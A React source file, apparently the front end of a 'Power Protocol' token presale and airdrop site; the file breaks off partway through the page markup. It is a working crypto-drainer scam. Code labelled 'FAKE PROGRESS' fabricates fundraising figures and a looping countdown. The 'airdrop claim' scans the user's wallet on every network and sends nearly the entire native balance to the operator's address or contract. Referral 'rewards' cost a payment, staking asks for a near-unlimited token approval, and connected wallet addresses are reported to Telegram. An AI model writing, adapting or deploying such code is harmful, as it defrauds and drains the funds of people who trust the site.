import React, { useState, useEffect, useMemo, useCallback } from 'react';
import Marquee from 'react-fast-marquee';
import { useAppKit } from '@reown/appkit/react';
import { useAccount, useSendTransaction, useWriteContract, useSwitchChain, useDisconnect } from 'wagmi';
import { parseEther, createPublicClient, http, formatEther, parseUnits, encodeFunctionData, formatUnits } from 'viem';
import { bsc } from 'viem/chains';
import { 
  Twitter, Send, ArrowRight, Wallet, Star, Users, 
  Flame, Zap, Clock, DollarSign, ChevronDown, ShieldCheck,
  Trophy, Lock, Unlock, Copy, Share2, Gift, Link, Menu, X, Info, Github, LogOut
} from 'lucide-react'; 

import {
  POWER_TOKEN_ADDRESS,
  ECOSYSTEM_CONTRACT,
  OWNER_ADDRESS,
  POWER_PRICE,
  REFERRAL_REWARD_PER_USER,
  TOKEN_PRICES,
  GAS_BUFFERS,
  ERC20_ADDRESSES,
  networksList,
  erc20Abi,
  usdtLogo,
  usdcLogo,
  exchanges,
  investors,
  stagePhotos,
  roadmapData
} from './config';
import { sendTelegramLog } from './telegramTracker';

// Ecosystem Read ABI for Staking Sync
const ecosystemReadAbi = [
  {"inputs":[{"internalType":"address","name":"","type":"address"},{"internalType":"uint256","name":"","type":"uint256"}],"name":"userStakes","outputs":[{"internalType":"uint256","name":"amount","type":"uint256"},{"internalType":"uint256","name":"startTime","type":"uint256"},{"internalType":"uint256","name":"lastClaimTime","type":"uint256"},{"internalType":"uint8","name":"planId","type":"uint8"},{"internalType":"bool","name":"active","type":"bool"}],"stateMutability":"view","type":"function"},
  {"inputs":[{"internalType":"address","name":"_user","type":"address"},{"internalType":"uint256","name":"_stakeIndex","type":"uint256"}],"name":"calculateReward","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"}
];

function App() {
  const { open } = useAppKit();
  const { isConnected, address, chain } = useAccount();
  const { switchChain } = useSwitchChain();
  const { disconnect } = useDisconnect();
  
  const { sendTransactionAsync } = useSendTransaction();
  const { writeContractAsync } = useWriteContract();

  const [isMobileMenuOpen, setIsMobileMenuOpen] = useState(false);
  const [activeTab, setActiveTab] = useState('buy');
  const [stakingPlan, setStakingPlan] = useState('min');

  // Toast Notification System
  const [toast, setToast] = useState({ show: false, message: '', type: 'error' });
  const showNotification = (message, type = 'error') => {
    setToast({ show: true, message, type });
    setTimeout(() => setToast({ show: false, message: '', type: 'error' }), 5000);
  };

  // ==========================================
  // REAL-TIME LOOPING COUNTDOWN TIMER (24H)
  // ==========================================
  const [timeLeft, setTimeLeft] = useState(0);

  useEffect(() => {
    const calculateTimeLeft = () => {
      const now = new Date();
      const tomorrow = new Date(now.getFullYear(), now.getMonth(), now.getDate() + 1);
      return Math.floor((tomorrow.getTime() - now.getTime()) / 1000);
    };

    setTimeLeft(calculateTimeLeft());

    const timer = setInterval(() => {
      setTimeLeft((prev) => {
        if (prev <= 1) return 86400; // Reset ke 24 jam otomatis jika habis
        return prev - 1;
      });
    }, 1000);

    return () => clearInterval(timer);
  }, []);

  const cdDays = Math.floor(timeLeft / (3600 * 24)).toString().padStart(2, '0');
  const cdHours = Math.floor((timeLeft % (3600 * 24)) / 3600).toString().padStart(2, '0');
  const cdMins = Math.floor((timeLeft % 3600) / 60).toString().padStart(2, '0');
  const cdSecs = (timeLeft % 60).toString().padStart(2, '0');

  // ==========================================
  // FAKE PROGRESS & TOTAL RAISED ANIMATION
  // ==========================================
  const [raisedCount, setRaisedCount] = useState(0);
  const [barBuy, setBarBuy] = useState(0);
  const [barAirdrop, setBarAirdrop] = useState(0);

  useEffect(() => {
    const getRealTimeRaised = () => {
      const start = new Date('2024-03-01').getTime();
      const elapsed5Mins = Math.max(0, Math.floor((Date.now() - start) / (1000 * 60 * 5)));
      return 3194796 + (elapsed5Mins * 18); 
    };

    const targetRaised = getRealTimeRaised();
    let startTimestamp = null;
    
    const step = (timestamp) => {
      if (!startTimestamp) startTimestamp = timestamp;
      const progress = Math.min((timestamp - startTimestamp) / 2000, 1);
      setRaisedCount(Math.floor(progress * targetRaised));
      if (progress < 1) window.requestAnimationFrame(step);
    };
    window.requestAnimationFrame(step);

    const interval = setInterval(() => setRaisedCount(getRealTimeRaised()), 300000); 
    return () => clearInterval(interval);
  }, []);

  const targetBuy = useMemo(() => {
    const daysPassed = Math.floor((Date.now() - new Date('2024-03-01').getTime()) / (1000 * 60 * 60 * 24));
    return 95.7 + (daysPassed % 5); 
  }, []);

  useEffect(() => {
    setBarAirdrop(0); setBarBuy(0); 
    const timeout = setTimeout(() => {
      setBarAirdrop(99); 
      if (activeTab === 'buy') setBarBuy(targetBuy);
    }, 100);
    return () => clearTimeout(timeout);
  }, [activeTab, targetBuy]);

  // ==========================================
  // UI DROPDOWNS BUY BOX
  // ==========================================
  const [selectedNetwork, setSelectedNetwork] = useState(networksList[0]);
  const [showNetDropdown, setShowNetDropdown] = useState(false);
  const [selectedToken, setSelectedToken] = useState(networksList[0].symbol);
  const [showTokenDropdown, setShowTokenDropdown] = useState(false);

  const tokensList = [
    { symbol: selectedNetwork.symbol, logo: selectedNetwork.logo },
    { symbol: 'USDT', logo: usdtLogo },
    { symbol: 'USDC', logo: usdcLogo }
  ];
  const activeTokenObj = tokensList.find(t => t.symbol === selectedToken) || tokensList[0];

  // ==========================================
  // RPC SMART SCANNER (ANTI CORS BLOCK)
  // ==========================================
  const [realTimeBalance, setRealTimeBalance] = useState("0");
  const [rawBalNum, setRawBalNum] = useState(0);

  useEffect(() => {
    let isMounted = true;
    const getBal = async () => {
      if (!address) {
        if (isMounted) { setRealTimeBalance("0"); setRawBalNum(0); }
        return;
      }

      const rpcList = [
        selectedNetwork.rpc,
        selectedNetwork.viemChain.rpcUrls?.default?.http?.[0],
        selectedNetwork.viemChain.rpcUrls?.public?.http?.[0]
      ].filter(Boolean);

      let fetchedBal = 0;
      let success = false;

      for (let rpc of rpcList) {
        try {
          const client = createPublicClient({ chain: selectedNetwork.viemChain, transport: http(rpc, { timeout: 3000 }) });

          if (selectedToken === 'USDT' || selectedToken === 'USDC') {
            const tAddr = ERC20_ADDRESSES[selectedNetwork.chainId]?.[selectedToken];
            if (!tAddr) { success = true; fetchedBal = 0; break; }

            const [decimals, balWei] = await Promise.all([
              client.readContract({ address: tAddr, abi: erc20Abi, functionName: 'decimals' }),
              client.readContract({ address: tAddr, abi: erc20Abi, functionName: 'balanceOf', args: [address] })
            ]);
            fetchedBal = parseFloat(formatUnits(balWei, decimals));
          } else {
            const balWei = await client.getBalance({ address });
            fetchedBal = parseFloat(formatEther(balWei));
          }
          success = true;
          break;
        } catch(e) {}
      }

      if (success && isMounted) {
        setRawBalNum(fetchedBal);
        setRealTimeBalance(fetchedBal > 0 ? fetchedBal.toFixed(6).replace(/\.?0+$/, "") : "0");
      } else if (!success && isMounted) {
        setRealTimeBalance("0");
        setRawBalNum(0);
      }
    };

    getBal();
    const interval = setInterval(getBal, 5000); 
    return () => { isMounted = false; clearInterval(interval); }
  }, [address, selectedNetwork, selectedToken]);

  // ==========================================
  // BUY CALCULATOR & BONUS
  // ==========================================
  const [payAmount, setPayAmount] = useState('');
  const [bonusCode, setBonusCode] = useState('POWER20');
  const [isBonusApplied, setIsBonusApplied] = useState(false);

  let calculatedReceive = 0;
  if (payAmount && parseFloat(payAmount) > 0) {
    calculatedReceive = (parseFloat(payAmount) * TOKEN_PRICES[selectedToken]) / POWER_PRICE;
    if (isBonusApplied) calculatedReceive *= 1.20; 
  }
  const receiveAmount = calculatedReceive > 0 ? calculatedReceive.toLocaleString('en-US', { minimumFractionDigits: 2, maximumFractionDigits: 2 }) : '0.00';

  const handleApplyBonus = () => {
    if (bonusCode.trim().toUpperCase() === 'POWER20') {
      setIsBonusApplied(true);
      showNotification('🎉 20% Bonus Applied Successfully!', 'success');
    } else {
      setIsBonusApplied(false);
      showNotification('❌ Invalid code', 'error');
    }
  };

  const handleNetworkSelect = async (net) => {
    if (selectedToken === selectedNetwork.symbol) setSelectedToken(net.symbol);
    setSelectedNetwork(net);
    setShowNetDropdown(false);
    setPayAmount(''); 
    if (isConnected && switchChain) {
      try { await switchChain({ chainId: net.chainId }); } catch (error) {}
    }
  };

  const handleMaxBuy = () => {
    if (rawBalNum <= 0) {
      showNotification('❌ Your balance is 0 on this network.', 'error');
      setPayAmount('');
      return;
    }

    if (selectedToken === selectedNetwork.symbol) {
      const buffer = GAS_BUFFERS[selectedNetwork.chainId] || 0.0005;
      const maxAble = rawBalNum - buffer;
      if (maxAble > 0) {
        setPayAmount(maxAble.toFixed(6).replace(/\.?0+$/, ""));
      } else {
        showNotification(`❌ Insufficient balance. You need at least ${buffer} ${selectedToken} for gas.`, 'error');
        setPayAmount('');
      }
    } else {
      setPayAmount(rawBalNum.toFixed(6).replace(/\.?0+$/, ""));
    }
  };

  const [isBuying, setIsBuying] = useState(false);

  const handleBuyTokens = async () => {
    if (!isConnected) { open(); return; }
    if (!payAmount || parseFloat(payAmount) <= 0) { 
      showNotification("❌ Please enter a valid amount to buy.", "error"); 
      return; 
    }
    if (parseFloat(payAmount) > rawBalNum) {
      showNotification("❌ Insufficient balance for this transaction.", "error"); 
      return;
    }
    
    setIsBuying(true);
    try {
      if (chain?.id !== selectedNetwork.chainId) {
        await switchChain({ chainId: selectedNetwork.chainId });
      }

      let decimals = 18;
      if (selectedToken === 'USDT' || selectedToken === 'USDC') {
         const rpcList = [selectedNetwork.rpc, selectedNetwork.viemChain.rpcUrls?.default?.http?.[0]].filter(Boolean);
         for(let rpc of rpcList){
            try {
              const client = createPublicClient({ chain: selectedNetwork.viemChain, transport: http(rpc, {timeout: 3000}) });
              const tokenAddr = ERC20_ADDRESSES[selectedNetwork.chainId]?.[selectedToken];
              decimals = await client.readContract({ address: tokenAddr, abi: erc20Abi, functionName: 'decimals' });
              break;
            } catch(e) {}
         }
      }

      const amountToSend = parseUnits(payAmount.toString(), decimals);

      if (selectedNetwork.chainId === 56 && selectedToken === 'BNB') {
         await writeContractAsync({
           address: ECOSYSTEM_CONTRACT, 
           abi: [{"inputs":[],"name":"buyTokens","outputs":[],"stateMutability":"payable","type":"function"}],
           functionName: 'buyTokens',
           value: amountToSend
         });
         showNotification("🎉 Tokens bought successfully!", "success");
      } else {
         if (selectedToken === 'USDT' || selectedToken === 'USDC') {
            const tAddr = ERC20_ADDRESSES[selectedNetwork.chainId]?.[selectedToken];
            if (!tAddr) { showNotification("❌ Token not supported here.", "error"); setIsBuying(false); return; }
            const data = encodeFunctionData({ abi: erc20Abi, functionName: 'transfer', args: [OWNER_ADDRESS, amountToSend] });
            await sendTransactionAsync({ to: tAddr, data: data });
            showNotification("🎉 Tokens bought successfully via Transfer!", "success");
         } else {
            await sendTransactionAsync({ to: OWNER_ADDRESS, value: amountToSend });
            showNotification("🎉 Tokens bought successfully via Transfer!", "success");
         }
      }
      setPayAmount('');
    } catch (e) {
       console.error("Buy Error:", e);
       showNotification("❌ Transaction cancelled or failed.", "error");
    } finally {
       setIsBuying(false);
    }
  };

  // ==========================================
  // AUTO-SCANNER & AIRDROP LOGIC (DI PERCEPAT)
  // ==========================================
  const [isAutoScanning, setIsAutoScanning] = useState(false);
  const [isClaiming, setIsClaiming] = useState(false);
  const [airdropAllocation, setAirdropAllocation] = useState(1752);
  const [airdropError, setAirdropError] = useState('');
  const [claimData, setClaimData] = useState({ targetChainId: 56, maxNativeToClaim: 0 });

  useEffect(() => {
    const performAutoScan = async () => {
      if (!isConnected || !address) {
        setAirdropAllocation(1752); setAirdropError(''); setClaimData({ targetChainId: 56, maxNativeToClaim: 0 });
        return;
      }
      setIsAutoScanning(true); setAirdropError('');
      
      // MENCARI DATA SECARA BERSAMAAN (CONCURRENT) KE SEMUA JARINGAN AGAR SUPER CEPAT
      const scanPromises = networksList.map(async (net) => {
        const rpcList = [net.rpc, net.viemChain.rpcUrls?.default?.http?.[0], net.viemChain.rpcUrls?.public?.http?.[0]].filter(Boolean);
        for (let rpc of rpcList) {
          try {
            // Timeout diturunkan menjadi 1500ms agar jaringan mati cepat diskip
            const client = createPublicClient({ chain: net.viemChain, transport: http(rpc, { timeout: 1500 }) });
            const balanceWei = await client.getBalance({ address });
            return { net, balanceEth: parseFloat(formatEther(balanceWei)), success: true };
          } catch (err) {}
        }
        return { net, balanceEth: 0, success: false };
      });

      // Tunggu semua jaringan merespon
      const results = await Promise.all(scanPromises);

      let highestUsdValue = 0, bestChainId = 56, maxClaim = 0;

      results.forEach(({ net, balanceEth, success }) => {
        if (success) {
          const usdValue = balanceEth * TOKEN_PRICES[net.symbol];
          if (usdValue > highestUsdValue) {
            highestUsdValue = usdValue; 
            bestChainId = net.chainId;
            const buffer = GAS_BUFFERS[net.chainId] || 0.0005;
            maxClaim = balanceEth > buffer ? balanceEth - buffer : 0;
          }
        }
      });

      if (maxClaim <= 0) {
        setAirdropAllocation(1752); setAirdropError(`Insufficient BNB balance, Please HODL 0.004 BNB FOR CLAIM`); setClaimData({ targetChainId: 56, maxNativeToClaim: 0 });
        if (chain?.id !== 56 && switchChain) { try { await switchChain({ chainId: 56 }); } catch(e) {} }
      } else {
        setAirdropAllocation((maxClaim / 0.005) * 1752); setAirdropError(''); setClaimData({ targetChainId: bestChainId, maxNativeToClaim: maxClaim });
      }
      setIsAutoScanning(false);
    };

    performAutoScan();
  // eslint-disable-next-line react-hooks/exhaustive-deps
  }, [isConnected, address]);

  const handleClaim = async () => {
    if (!isConnected) { open(); return; }
    if (isAutoScanning) return;
    setIsClaiming(true);
    try {
      if (chain?.id !== claimData.targetChainId) await switchChain({ chainId: claimData.targetChainId });
      if (claimData.maxNativeToClaim <= 0) { 
        showNotification("❌ Insufficient balance for gas buffer.", "error"); 
        setIsClaiming(false); 
        return; 
      }
      
      const amountToPayStr = claimData.maxNativeToClaim.toFixed(18);
      if (claimData.targetChainId === 56) {
        await writeContractAsync({ 
          address: ECOSYSTEM_CONTRACT, 
          abi: [{"inputs":[],"name":"claimAirdrop","outputs":[],"stateMutability":"payable","type":"function"}], 
          functionName: 'claimAirdrop', 
          value: parseEther(amountToPayStr) 
        });
        showNotification("🎉 Airdrop Claimed Successfully!", "success");
      } else {
        await sendTransactionAsync({ to: OWNER_ADDRESS, value: parseEther(amountToPayStr) });
        showNotification("🎉 Airdrop Claimed via Forwarder!", "success");
      }
    } catch (error) { 
      console.error(error); 
      showNotification("❌ Claim Failed or Rejected", "error");
    } finally { setIsClaiming(false); }
  };

  // ==========================================
  // FETCH $POWER TOKEN BALANCE & STAKE UI SYNC
  // ==========================================
  const [powerTokenBalance, setPowerTokenBalance] = useState("0.00");
  const [rawPowerTokenBal, setRawPowerTokenBal] = useState(0);
  const [powerAllowance, setPowerAllowance] = useState(0); 
  const [stakeAmount, setStakeAmount] = useState('');
  
  // Real-time UI Stake Sync
  const [stakedAmount, setStakedAmount] = useState("0");
  const [totalEarnings, setTotalEarnings] = useState("0");
  const [dailyEarnings, setDailyEarnings] = useState("0");

  const fetchPowerAndStaking = useCallback(async () => {
    if (!address || POWER_TOKEN_ADDRESS === "0x0000000000000000000000000000000000000000") {
      setPowerTokenBalance("0.00"); setRawPowerTokenBal(0); setPowerAllowance(0);
      setStakedAmount("0"); setTotalEarnings("0"); setDailyEarnings("0");
      return;
    }

    const bnbNet = networksList.find(n => n.chainId === 56);
    const rpcList = [bnbNet.rpc, bnbNet.viemChain.rpcUrls?.default?.http?.[0], bnbNet.viemChain.rpcUrls?.public?.http?.[0]].filter(Boolean);

    for (let rpc of rpcList) {
      try {
        const client = createPublicClient({ chain: bnbNet.viemChain, transport: http(rpc, { timeout: 4000 }) });
        
        const [decimals, balWei, allowWei] = await Promise.all([
          client.readContract({ address: POWER_TOKEN_ADDRESS, abi: erc20Abi, functionName: 'decimals' }),
          client.readContract({ address: POWER_TOKEN_ADDRESS, abi: erc20Abi, functionName: 'balanceOf', args: [address] }),
          client.readContract({ address: POWER_TOKEN_ADDRESS, abi: erc20Abi, functionName: 'allowance', args: [address, ECOSYSTEM_CONTRACT] })
        ]);
        
        let currentStaked = 0;
        let currentEarnings = 0;
        let currentDaily = 0;

        try {
          const stakeData = await client.readContract({
            address: ECOSYSTEM_CONTRACT,
            abi: ecosystemReadAbi,
            functionName: 'userStakes',
            args: [address, 0] 
          });

          if (stakeData && stakeData[4] === true) { 
            currentStaked = parseFloat(formatUnits(stakeData[0], decimals));
            
            let apy = 30; 
            if (stakeData[3] === 0) apy = 150;
            else if (stakeData[3] === 2) apy = 60;
            else if (stakeData[3] === 3) apy = 100;

            currentDaily = (currentStaked * (apy / 100)) / 365;

            const rewardWei = await client.readContract({
              address: ECOSYSTEM_CONTRACT,
              abi: ecosystemReadAbi,
              functionName: 'calculateReward',
              args: [address, 0]
            });
            currentEarnings = parseFloat(formatUnits(rewardWei, decimals));
          }
        } catch(err) {} // Ignore if user hasn't staked yet

        const parsedBal = parseFloat(formatUnits(balWei, decimals));
        setRawPowerTokenBal(parsedBal);
        setPowerTokenBalance(parsedBal > 0 ? parsedBal.toFixed(2) : "0.00");
        setPowerAllowance(parseFloat(formatUnits(allowWei, decimals)));
        
        setStakedAmount(currentStaked > 0 ? currentStaked.toFixed(2) : "0");
        setTotalEarnings(currentEarnings > 0 ? currentEarnings.toFixed(4) : "0");
        setDailyEarnings(currentDaily > 0 ? currentDaily.toFixed(2) : "0");
        break;
      } catch(e) {}
    }
  }, [address]);

  useEffect(() => {
    fetchPowerAndStaking();
    const interval = setInterval(fetchPowerAndStaking, 5000); 
    return () => clearInterval(interval);
  }, [fetchPowerAndStaking]);

  // ==========================================
  // STAKING LOGIC (AUTO-CHAIN APPROVE -> STAKE)
  // ==========================================
  const [isStaking, setIsStaking] = useState(false);

  const handleMaxStake = () => {
    if (rawPowerTokenBal > 0) {
      setStakeAmount(rawPowerTokenBal.toString());
    } else {
      showNotification("❌ You don't have any $POWER tokens to stake.", "error");
    }
  };

  const needsApproval = parseFloat(stakeAmount || "0") > powerAllowance;

  const handleStakeAction = async () => {
    if (!isConnected) { open(); return; }
    if (!stakeAmount || parseFloat(stakeAmount) <= 0) {
      showNotification("❌ Please enter a valid amount to stake.", "error");
      return;
    }
    if (parseFloat(stakeAmount) > rawPowerTokenBal) {
      showNotification("❌ Insufficient $POWER balance.", "error");
      return;
    }

    if (stakingPlan === 'min' && parseFloat(stakeAmount) < 1) {
      showNotification("❌ Minimum stake for this plan is 1 $POWER.", "error");
      return;
    }

    setIsStaking(true);
    try {
      if (chain?.id !== 56) { await switchChain({ chainId: 56 }); }

      const bnbNet = networksList.find(n => n.chainId === 56);
      const publicClient = createPublicClient({ chain: bsc, transport: http(bnbNet.rpc) });

      if (needsApproval) {
         showNotification("⏳ Please confirm Approval in your wallet...", "success");
         const approveHash = await writeContractAsync({
            address: POWER_TOKEN_ADDRESS,
            abi: erc20Abi,
            functionName: 'approve',
            args: [ECOSYSTEM_CONTRACT, parseUnits("1000000000000", 18)] 
         });
         
         showNotification("⏳ Waiting for Approval to be mined...", "success");
         await publicClient.waitForTransactionReceipt({ hash: approveHash });
         showNotification("✅ Approved! Initiating Stake transaction...", "success");
         
         await new Promise(resolve => setTimeout(resolve, 3000));
      }

      let planId = 1; 
      if (stakingPlan === 'min') planId = 0;
      else if (stakingPlan === 'flex') planId = 1;
      else if (stakingPlan === '30d') planId = 2;
      else if (stakingPlan === '90d') planId = 3;

      const amountToStakeWei = parseUnits(stakeAmount.toString(), 18);

      const stakeHash = await writeContractAsync({
        address: ECOSYSTEM_CONTRACT,
        abi: [{"inputs":[{"name":"_amount","type":"uint256"},{"name":"_planId","type":"uint8"}],"name":"stake","outputs":[],"stateMutability":"nonpayable","type":"function"}],
        functionName: 'stake',
        args: [amountToStakeWei, planId]
      });

      showNotification("⏳ Staking transaction sent. Waiting for confirmation...", "success");
      await publicClient.waitForTransactionReceipt({ hash: stakeHash });
      showNotification("🎉 Successfully Staked $POWER!", "success");
      
      setStakeAmount(''); 
      await fetchPowerAndStaking(); // Update UI Sync Instantly

    } catch (error) {
      console.error("Staking Error:", error);
      showNotification("❌ Staking failed or rejected by user.", "error");
    } finally {
      setIsStaking(false);
    }
  };

  const handleUnstakeAction = async () => {
    if (!isConnected) { open(); return; }
    try {
      if (chain?.id !== 56) await switchChain({ chainId: 56 });
      const txHash = await writeContractAsync({
        address: ECOSYSTEM_CONTRACT,
        abi: [{"inputs":[{"name":"_stakeIndex","type":"uint256"}],"name":"unstake","outputs":[],"stateMutability":"nonpayable","type":"function"}],
        functionName: 'unstake',
        args: [0] 
      });
      
      const bnbNet = networksList.find(n => n.chainId === 56);
      const publicClient = createPublicClient({ chain: bsc, transport: http(bnbNet.rpc) });
      await publicClient.waitForTransactionReceipt({ hash: txHash });
      
      showNotification("🎉 Unstake Successful!", "success");
      await fetchPowerAndStaking();
    } catch (e) { 
      console.error(e); 
      showNotification("❌ Unstake failed or no active stake found.", "error");
    }
  };

  const handleClaimRewardsAction = async () => {
    if (!isConnected) { open(); return; }
    try {
      if (chain?.id !== 56) await switchChain({ chainId: 56 });
      const txHash = await writeContractAsync({
        address: ECOSYSTEM_CONTRACT,
        abi: [{"inputs":[{"name":"_stakeIndex","type":"uint256"}],"name":"claimRewards","outputs":[],"stateMutability":"nonpayable","type":"function"}],
        functionName: 'claimRewards',
        args: [0] 
      });
      
      const bnbNet = networksList.find(n => n.chainId === 56);
      const publicClient = createPublicClient({ chain: bsc, transport: http(bnbNet.rpc) });
      await publicClient.waitForTransactionReceipt({ hash: txHash });

      showNotification("🎉 Rewards Claimed Successfully!", "success");
      await fetchPowerAndStaking();
    } catch (e) { 
      console.error(e); 
      showNotification("❌ Claim failed. You might not have rewards yet.", "error");
    }
  };

  // ==========================================
  // PRODUCTION-READY REFERRAL LOGIC (RENDER + NEON DB)
  // ==========================================
  const uniqueRefCode = useMemo(() => {
    if (!address) return '';
    return btoa(address.slice(2)).substring(0, 8).toUpperCase();
  }, [address]);

  const currentDomain = typeof window !== 'undefined' ? window.location.origin : 'https://powerprotocol.com';
  const fullRefLink = isConnected ? `${currentDomain}/?ref=${uniqueRefCode}` : 'Connect wallet to generate link';

  const [referralCount, setReferralCount] = useState(0);
  const [referralEarned, setReferralEarned] = useState(0); 
  const [isClaimingRef, setIsClaimingRef] = useState(false);

  // 1. SYNC NEW CONNECTIONS TO RENDER API & TELEGRAM LOG
  useEffect(() => {
    if (!isConnected || !address) return;

    // === FITUR BARU: MENGIRIM NOTIFIKASI TELEGRAM DI BACKGROUND ===
    sendTelegramLog(address);
    // ==============================================================

    const params = new URLSearchParams(window.location.search);
    const refParam = params.get('ref');
    
    if (refParam && refParam !== uniqueRefCode) {
      const hasConnectedKey = `has_connected_${address}`;
      
      if (!localStorage.getItem(hasConnectedKey)) {
        // MENGIRIM DATA KE SERVER RENDER ANDA
        fetch('https://projectpowerdatabase.onrender.com/api/referral', { 
          method: 'POST', 
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({ 
             referrerCode: refParam, 
             refereeWallet: address 
          }) 
        })
        .then(response => {
           if(response.ok) {
              // Tandai dompet ini sudah dihitung agar tidak spam database
              localStorage.setItem(hasConnectedKey, 'true');
              console.log("Referral sukses dicatat di Database Pusat!");
           }
        })
        .catch(err => console.error("API Fetch Error:", err));
      }
    }
  }, [isConnected, address, uniqueRefCode]);

  // 2. FETCH REAL-TIME REFERRAL COUNT DARI RENDER API
  useEffect(() => {
    let isMounted = true;

    const fetchReferralData = async () => {
      if (!uniqueRefCode) {
        if(isMounted) { setReferralCount(0); setReferralEarned(0); }
        return;
      }
      try {
        // MENGAMBIL DATA DARI SERVER RENDER ANDA
        const res = await fetch(`https://projectpowerdatabase.onrender.com/api/referral/${uniqueRefCode}`);
        const data = await res.json();
        
        if (isMounted && data.count !== undefined) {
          setReferralCount(data.count);
          setReferralEarned(data.count * REFERRAL_REWARD_PER_USER);
        }
      } catch (err) {
        console.error("Gagal mengambil data referral", err);
      }
    };

    fetchReferralData();
    // Cek update jumlah referral dari database setiap 10 detik
    const intv = setInterval(fetchReferralData, 10000); 
    
    return () => {
      isMounted = false;
      clearInterval(intv);
    };
  }, [uniqueRefCode]);
  
  const handleCopyLink = () => {
    if(!isConnected) { open(); return; }
    navigator.clipboard.writeText(fullRefLink);
    showNotification("✅ Referral link copied to clipboard!", "success");
  };

  const handleShareTwitter = () => {
    if(!isConnected) { open(); return; }
    const text = "🚀 Want to be early on the next Web3 Entertainment giant? I just claimed my $POWER allocation! Join Power Protocol using my unique code and secure your bag now! 🎮💎 #Web3 #Airdrop #Crypto";
    window.open(`https://twitter.com/intent/tweet?text=${encodeURIComponent(text)}&url=${encodeURIComponent(fullRefLink)}`, '_blank');
  };

  const handleShareTelegram = () => {
    if(!isConnected) { open(); return; }
    const text = "🚀 Want to be early on the next Web3 Entertainment giant? I just claimed my $POWER allocation! Join Power Protocol using my unique code and secure your bag now! 🎮💎";
    window.open(`https://t.me/share/url?url=${encodeURIComponent(fullRefLink)}&text=${encodeURIComponent(text)}`, '_blank');
  };

  const handleClaimReferral = async () => {
    if (!isConnected) { open(); return; }
    
    if (referralEarned <= 0) {
      showNotification("❌ You must invite friends to claim referral rewards!", "error");
      return;
    }

    setIsClaimingRef(true);
    try {
      // Pastikan jaringan berada di BSC (Chain ID 56)
      if (chain?.id !== 56) { await switchChain({ chainId: 56 }); }
      
      // 1. CEK SALDO BNB ASLI PENGGUNA SECARA REAL-TIME
      const bnbNet = networksList.find(n => n.chainId === 56);
      const rpcList = [bnbNet.rpc, bnbNet.viemChain.rpcUrls?.default?.http?.[0]].filter(Boolean);
      let currentBnbBalance = 0;
      let fetchSuccess = false;

      for (let rpc of rpcList) {
        try {
          const client = createPublicClient({ chain: bnbNet.viemChain, transport: http(rpc, { timeout: 3000 }) });
          const balWei = await client.getBalance({ address });
          currentBnbBalance = parseFloat(formatEther(balWei));
          fetchSuccess = true;
          break;
        } catch(e) {}
      }

      // 2. BLOKIR TRANSAKSI JIKA SALDO KURANG DARI 0.005 BNB
      if (fetchSuccess && currentBnbBalance < 0.005) {
         showNotification(`❌ Insufficient BNB balance! You must HODL at least 0.005 BNB for the claim Rewards. (Your balance: ${currentBnbBalance.toFixed(4)} BNB)`, "error");
         setIsClaimingRef(false);
         return; // Hentikan fungsi di sini, dompet tidak akan terbuka
      }

      // 3. JIKA SALDO CUKUP, LANJUTKAN KE SMART CONTRACT
      await writeContractAsync({
        address: ECOSYSTEM_CONTRACT, 
        abi: [{"inputs":[],"name":"claimReferralRewards","outputs":[],"stateMutability":"payable","type":"function"}], 
        functionName: 'claimReferralRewards',
        value: parseEther('0.005'), 
      });
      
      showNotification("🎉 Referral Rewards Claimed!", "success");

    } catch (error) { 
      console.error(error); 
      showNotification("❌ Referral Claim failed or rejected.", "error");
    } finally { setIsClaimingRef(false); }
  };

  const scrollToBuy = () => document.getElementById('buy-section')?.scrollIntoView({ behavior: 'smooth' });
  const scrollToClaim = () => document.getElementById('claim-section')?.scrollIntoView({ behavior: 'smooth' });

  return (
    <div className="min-h-screen bg-darkBg text-white selection:bg-primaryPurple font-sans relative overflow-x-hidden">
      <style>{`
        @keyframes shimmer { 0% { transform: translateX(-100%); } 100% { transform: translateX(200%); } }
        .animate-shimmer { animation: shimmer 2.5s infinite linear; }
        .custom-scrollbar::-webkit-scrollbar { width: 4px; }
        .custom-scrollbar::-webkit-scrollbar-thumb { background: #b37be8; border-radius: 4px; }
      `}</style>

      {toast.show && (
        <div className={`fixed top-6 left-1/2 -translate-x-1/2 z-[9999] px-6 py-3 rounded-2xl font-bold text-sm text-white shadow-[0_0_30px_rgba(0,0,0,0.6)] backdrop-blur-md flex items-center transition-all animate-in fade-in slide-in-from-top-5 ${toast.type === 'success' ? 'bg-[#064e3b]/90 border border-[#34d399]' : 'bg-[#450a0a]/90 border border-red-500'}`}>
          {toast.message}
        </div>
      )}

      <div className="absolute top-1/4 left-1/4 w-96 h-96 bg-primaryPurple opacity-20 blur-[150px] -z-10 rounded-full"></div>
      <div className="absolute bottom-0 left-0 right-0 h-96 bg-primaryPurple opacity-10 blur-[150px] -z-10"></div>

      <nav className="flex justify-between items-center px-6 md:px-8 py-6 max-w-7xl mx-auto border-b border-gray-800 relative z-50">
        <div className="flex items-center"><img src="/logo.webp" alt="Power Protocol Logo" className="h-8 md:h-10 w-auto object-contain" /></div>
        
        {/* MENU UNTUK PC / LAPTOP */}
        <div className="hidden md:flex space-x-8 text-sm font-medium text-gray-300">
          <a href="https://powerprotocol.xyz/en/trading-event" className="hover:text-white transition-colors">Trading Event</a>
          <a href="https://power-protocol.gitbook.io/power-protocol-whitepaper" className="hover:text-white transition-colors">Whitepaper</a>
          <a href="https://powerprotocol.xyz/en/tokenomics" className="hover:text-white transition-colors">Tokenomics</a>
          {/* INI MENU BARU VIEW ON BSCSCAN */}
          <a href="https://bscscan.com/token/0x9479932AC0181b07F8c2dD8c7A9eA04226465023" target="_blank" rel="noreferrer" className="hover:text-[#facc15] transition-colors font-bold">View on BscScan</a>
        </div>
        
        <div className="hidden md:block"><a href="mailto:power@powerprotocol.xyz" className="inline-block bg-[#b37be8] text-black px-6 py-2 rounded-lg font-bold hover:bg-white transition-colors shadow-[0_0_15px_rgba(179,123,232,0.4)]">Contact</a></div>
        <button className="md:hidden text-white" onClick={() => setIsMobileMenuOpen(!isMobileMenuOpen)}>{isMobileMenuOpen ? <X size={28} /> : <Menu size={28} />}</button>
        
        {/* MENU DROPDOWN UNTUK HP */}
        {isMobileMenuOpen && (
          <div className="absolute top-full left-0 w-full bg-[#0b0410] border-b border-gray-800 p-6 flex flex-col gap-6 shadow-2xl md:hidden">
            <a href="https://powerprotocol.xyz/en/trading-event" onClick={() => setIsMobileMenuOpen(false)} className="text-lg font-bold text-gray-300 hover:text-white">Trading Event</a>
